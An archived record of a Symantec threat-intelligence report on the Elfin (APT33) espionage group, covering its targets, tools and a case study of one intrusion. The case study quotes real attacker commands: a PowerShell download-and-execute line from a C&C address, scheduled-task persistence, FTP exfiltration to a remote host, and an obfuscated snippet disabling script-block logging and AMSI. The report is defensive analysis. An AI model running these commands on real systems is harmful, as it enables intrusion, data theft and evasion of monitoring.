{ "id": "8eb332cd-aedd-4367-bb11-bd343adb480e", "created_at": "2026-04-06T00:09:32.101786Z", "updated_at": "2026-04-10T03:34:03.017008Z", "deleted_at": null, "sha1_hash": "30d5a1c22af2711a79fa2251f523cd2e0b4faa1a", "title": "Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 71349, "plain_text": "Elfin: Relentless Espionage Group Targets Multiple Organizations in\r\nSaudi Arabia and U.S.\r\nBy About the Author\r\nArchived: 2026-04-05 16:11:54 UTC\r\nThe Elfin espionage group (aka APT33) has remained highly active over the past three years, attacking at least 50\r\norganizations in Saudi Arabia, the United States, and a range of other countries.\r\nThe group, which first became active in late 2015 or early 2016, specializes in scanning for vulnerable websites and using\r\nthis to identify potential targets, either for attacks or creation of command and control (C\u0026C) infrastructure. It has\r\ncompromised a wide range of targets, including governments along with organizations in the research, chemical,\r\nengineering, manufacturing, consulting, finance, telecoms, and several other sectors.\r\nMany U.S. targets\r\nElfin continues to be focused heavily on Saudi Arabia, which accounted for 42 percent of attacks observed by Symantec\r\nsince the beginning of 2016. However, the U.S. has also been a country of significant interest to the group, with 18\r\norganizations attacked over the past three years, including a number of Fortune 500 companies.\r\nElfin targets in the U.S. have included organizations in the engineering, chemical, research, energy consultancy, finance, IT,\r\nand healthcare sectors.\r\nSome of these U.S. organizations may have been targeted by Elfin for the purpose of mounting supply chain attacks. In one\r\ninstance, a large U.S. company was attacked in the same month a Middle Eastern company it co-owns was also\r\ncompromised.\r\nVulnerability exploitation\r\nIn a recent wave of attacks during February 2019, Elfin attempted to exploit a known vulnerability (CVE-2018-20250) in\r\nWinRAR, the widely used file archiving and compression utility capable of creating self-extracting archive files. The exploit\r\nwas used against one target in the chemical sector in Saudi Arabia. If successfully exploited on an unpatched computer, the\r\nvulnerability could permit an attacker to install any file on the computer, which effectively permits code execution on the\r\ntargeted computer.\r\nTwo users in the targeted organization received a file called \"JobDetails.rar\", which attempted to exploit the WinRAR\r\nvulnerability. This file was likely delivered via a spear-phishing email. However, prior to this attempted attack, Symantec\r\nhad rolled out proactive protection against any attempt to exploit this vulnerability (Exp.CVE-2018-20250). This protection\r\nsuccessfully protected the targeted organization from being compromised.\r\nThe Shamoon connection\r\nElfin came under the spotlight in December 2018 when it was linked with a new wave of Shamoon attacks. One Shamoon\r\nvictim in Saudi Arabia had recently also been attacked by Elfin and had been infected with the Stonedrill malware\r\n(Trojan.Stonedrill) used by Elfin. Because the Elfin and the Shamoon attacks against this organization occurred so close\r\ntogether, there has been speculation that the two groups may be linked. However, Symantec has found no further evidence to\r\nsuggest Elfin was responsible for these Shamoon attacks to date.  We continue to monitor the activities of both groups\r\nclosely.\r\nElfin’s toolset\r\nElfin has deployed a wide range of tools in its attacks including custom malware, commodity malware, and open-source\r\nhacking tools.\r\nCustom malware used by the group include:\r\nNotestuk (Backdoor.Notestuk) (aka TURNEDUP): Malware that can be used to open a backdoor and gather\r\ninformation from a compromised computer.\r\nhttps://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage\r\nPage 1 of 4\n\nStonedrill (Trojan.Stonedrill): Custom malware capable of opening a backdoor on an infected computer and\r\ndownloading additional files. The malware also features a destructive component, which can wipe the master boot\r\nrecord of an infected computer.\r\nAutoIt backdoor: A custom built backdoor written in the AutoIt scripting language.\r\nIn addition to its custom malware, Elfin has also used a number of commodity malware tools, available for purchase on the\r\ncyber underground. These include:\r\nRemcos (Backdoor.Remvio): A commodity remote administration tool (RAT) that can be used to steal information\r\nfrom an infected computer.\r\nDarkComet (Backdoor.Breut): Another commodity RAT used to open a backdoor on an infected computer and steal\r\ninformation.\r\nQuasar RAT (Trojan.Quasar): Commodity RAT that can be used to steal passwords and execute commands on an\r\ninfected computer.\r\nPupy RAT (Backdoor.Patpoopy): Commodity RAT that can open a backdoor on an infected computer.\r\nNanoCore (Trojan.Nancrat): Commodity RAT used to open a backdoor on an infected computer and steal\r\ninformation.\r\nNetWeird (Trojan.Netweird.B): A commodity Trojan which can open a backdoor and steal information from the\r\ncompromised computer. It may also download additional potentially malicious files.\r\nElfin also makes frequent use of a number of publicly available hacking tools, including:\r\nLaZagne (SecurityRisk.LaZagne): A login/password retrieval tool\r\nMimikatz (Hacktool.Mimikatz): Tool designed to steal credentials\r\nGpppassword: Tool used to obtain and decrypt Group Policy Preferences (GPP) passwords\r\nSniffPass (SniffPass): Tool designed to steal passwords by sniffing network traffic\r\nCase study: How an Elfin attack unfolds\r\nIn this section, we describe in detail an Elfin attack on a U.S. organization. On February 12, 2018 at 16:45 (all times are in\r\nthe organization’s local time), an email was sent to the organization advertising a job vacancy at an American global service\r\nprovider. The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880.\r\nThe recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded\r\ncontent from a C\u0026C server via an embedded iframe. At the same time, code embedded within this file also executed a\r\nPowerShell command to download and execute a copy of chfeeds.vbe from the C\u0026C server.\r\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX(New-Object\r\nNet.WebClient).DownloadString('hxxps://217.147.168[DOT]46:8088/index.jpg');\r\nA second JavaScript command was also executed, which created a scheduled task to execute chfeeds.vbe multiple times a\r\nday.\r\na.run('%windir%\\\\System32\\\\cmd.exe /c PowerShell -window hidden schtasks.exe /CREATE /SC DAILY /TN \"1\"\r\n/TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 01:00 /f \u0026\u0026 schtasks.exe\r\n/CREATE /SC DAILY /TN \"3\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST\r\n03:00 /f \u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"5\" /TR\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 05:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"7\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 07:00 /f\r\n\u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"9\" /TR\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 09:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"11\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 11:00 /f\r\n\u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"13\" /TR\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 13:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"15\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 15:00 /f\r\n\u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"17\" /TR\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 17:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"19\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 19:00 /f\r\n\u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"21\" /TR\r\nhttps://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage\r\nPage 2 of 4\n\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 21:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"23\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 23:00 /f ')\r\nThe chfeeds.vbe file acts as a downloader and was used to download a second PowerShell script (registry.ps1). This script in\r\nturn downloaded and executed a PowerShell backdoor known as POSHC2, a proxy-aware C\u0026C framework, from the C\u0026C\r\nserver (hxxps:// host-manager.hopto.org). Later at 20:57, the attackers became active on the compromised machine and\r\nproceeded to download the archiving tool WinRAR.\r\n89.34.237.118   808   hxxp://89.34.237[DOT]118:808/Rar32.exe\r\nAt 23:29, the attackers then proceeded to deploy an updated version of their POSHC2 stager.\r\n192.119.15.35   880   hxxp://mynetwork.ddns[DOT]net:880/st-36-p4578.ps1\r\nThis tool was downloaded several times between 23:29 on February 12 and 07:47 on February 13.\r\nTwo days later, on February 14 at 15:12, the attackers returned and installed Quasar RAT onto the infected computer that\r\ncommunicated with a C\u0026C server (217.147.168.123). Quasar RAT was installed to\r\nCSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe.\r\nAt this point, the attackers ceased activity while maintaining access to the network until February 21. At 06:38, the attackers\r\nwere observed downloading a custom .NET FTP tool to the infected computer.\r\n192.119.15.36   880   hxxp://192.119.15[DOT]36:880/ftp.exe\r\nLater at 6:56, the attackers exfiltrated data using this FTP tool to a remote host:\r\nJsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89.34.237.118:2020 -f\r\n/[REDACTED] -u [REDACTED] -p [REDACTED]\r\nActivity ceased until the attackers returned on March 5 and were observed using Quasar RAT to download a second custom\r\nAutoIt FTP exfiltration tool known as FastUploader from hxxp://192.119.15[DOT]36:880/ftp.exe. This tool was then\r\ninstalled to csidl_profile\\appdata\\roaming\\adobe\\ftp.exe. FastUploader is a custom FTP tool designed to exfiltrate data at a\r\nfaster rate than traditional FTP clients.\r\nAt this point, additional activity from the attackers continued between March 5 into April, and on April 18 at 11:50, a second\r\nremote access tool known as DarkComet was deployed to csidl_profile\\appdata\\roaming\\microsoft\\windows\\start\r\nmenu\\programs\\startup\\smss.exe on the infected computer. This was quickly followed 15 seconds later by the installation of\r\na credential dumping to csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe, and the execution of PowerShell\r\ncommands via PowerShell Empire, a freely available post-exploitation framework, to bypass logging on the infected\r\nmachine.\r\n$GPF=[Ref].AsSeMBLy.GeTTYPe('System.Management.Automation.Utils').\"GEtFiE`LD\"\r\n('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF)\r\n{$GPC=$GPF.GeTVALUE($NUlL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']\r\n['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']\r\n['EnableScriptBlockInvocationLogging']=0}$vAL=\r\n[COlLecTIons.GEneRic.DIctIoNARy[stRiNG,SyStEM.Object]]::nEw();$VAL.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add\r\n('EnableScriptBlockInvocationLogging',0);$GPC\r\n['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$VaL}ELSe{[SCRIPTBLOck\r\n('signatures','N'+'onPublic,Static').SETVAlue($NuLL,(New-ObjeCt ColLectiONs.GeNERic.HASHSEt[StrInG]))}\r\n[REF].AssemBLy.GetTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%\r\n{$_.GEtFielD('amsiInitFailed','NonPublic,Static').SETValUe($nUll,$TrUE)};\r\nActivity continued throughout April where additional versions of DarkComet, POSHC2 implants, and an AutoIt backdoor\r\nwere deployed along with further credential dumping activities.\r\nActive and agile attacker\r\nElfin is one of the most active groups currently operating in the Middle East, targeting a large number of organizations\r\nacross a diverse range of sectors. Over the past three years, the group has utilized a wide array of tools against its victims,\r\nhttps://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage\r\nPage 3 of 4\n\nranging from custom built malware to off-the-shelf RATs, indicating a willingness to continually revise its tactics and find\r\nwhatever tools it takes to compromise its next set of victims.\r\nProtection/Mitigation\r\nSymantec has the following protection in place to protect customers against these attacks:\r\nFile-based protection\r\nBackdoor.Notestuk\r\nTrojan.Stonedrill\r\nBackdoor.Remvio\r\nBackdoor.Breut\r\nTrojan.Quasar\r\nBackdoor.Patpoopy\r\nTrojan.Nancrat\r\nTrojan.Netweird.B\r\nExp.CVE-2018-20250\r\nSecurityRisk.LaZagne\r\nHacktool.Mimikatz\r\nSniffPass\r\nThreat intelligence\r\nIn addition to file-based protection, customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence\r\n(MATI) service have received reports on Elfin, which detail methods of detecting and thwarting activities of this group.\r\nSource: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage\r\nhttps://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia", "ETDA" ], "references": [ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" ], "report_names": [ "elfin-apt33-espionage" ], "threat_actors": [ { "id": "a63c994f-d7d6-4850-a881-730635798b90", "created_at": "2025-08-07T02:03:24.788883Z", "updated_at": "2026-04-10T02:00:03.785146Z", "deleted_at": null, "main_name": "COBALT TRINITY", "aliases": [ "APT33 ", "Elfin ", "HOLMIUM ", "MAGNALIUM ", "Peach Sandstorm ", "Refined Kitten ", "TA451 " ], "source_name": "Secureworks:COBALT TRINITY", "tools": [ "AutoCore", "Cadlotcorg", "Dello RAT", "FalseFont", "Imminent Monitor", "KDALogger", "Koadic", "NanoCore", "NetWire", "POWERTON", "PoshC2", "Poylog", "PupyRAT", "Schoolbag" ], "source_id": "Secureworks", "reports": null }, { "id": "e5ff825b-0456-4013-b90a-971b93def74a", "created_at": "2022-10-25T15:50:23.824058Z", "updated_at": "2026-04-10T02:00:05.377261Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "APT33", "HOLMIUM", "Elfin", "Peach Sandstorm" ], "source_name": "MITRE:APT33", "tools": [ "PowerSploit", "AutoIt backdoor", "PoshC2", "Mimikatz", "NanoCore", "DEADWOOD", "StoneDrill", "POWERTON", "LaZagne", "TURNEDUP", "NETWIRE", "Pupy", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f", "created_at": "2023-01-06T13:46:38.367369Z", "updated_at": "2026-04-10T02:00:02.945356Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "Elfin", "MAGNALLIUM", "HOLMIUM", "COBALT TRINITY", "G0064", "ATK35", "Peach Sandstorm", "TA451", "APT 33", "Refined Kitten" ], "source_name": "MISPGALAXY:APT33", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b938e2e3-3d1b-4b35-a031-ddf25b912557", "created_at": "2022-10-25T16:07:23.35582Z", "updated_at": "2026-04-10T02:00:04.55531Z", "deleted_at": null, "main_name": "APT 33", "aliases": [ "APT 33", "ATK 35", "Cobalt Trinity", "Curious Serpens", "Elfin", "G0064", "Holmium", "Magnallium", "Peach Sandstorm", "Refined Kitten", "TA451", "Yellow Orc" ], "source_name": "ETDA:APT 33", "tools": [ "Atros2.CKPN", "AutoIt backdoor", "Breut", "CinaRAT", "DROPSHOT", "DarkComet", "DarkKomet", "DistTrack", "EmPyre", "EmpireProject", "FYNLOS", "FalseFont", "Filerase", "Fynloski", "JuicyPotato", "Krademok", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "Mimikatz", "Nancrat", "NanoCore", "NanoCore RAT", "NetWeird", "NetWire", "NetWire RAT", "NetWire RC", "NetWired RC", "Notestuk", "POWERTON", "PoshC2", "PowerBand", "PowerShell Empire", "PowerSploit", "PsList", "Pupy", "PupyRAT", "Quasar RAT", "QuasarRAT", "Recam", "Remcos", "RemcosRAT", "Remvio", "SHAPESHIFT", "Shamoon", "Socmer", "StoneDrill", "TURNEDUP", "Tickler", "Yggdrasil", "Zurten", "klovbot", "pupy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434172, "ts_updated_at": 1775792043, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/30d5a1c22af2711a79fa2251f523cd2e0b4faa1a.pdf", "text": "https://archive.orkl.eu/30d5a1c22af2711a79fa2251f523cd2e0b4faa1a.txt", "img": "https://archive.orkl.eu/30d5a1c22af2711a79fa2251f523cd2e0b4faa1a.jpg" } }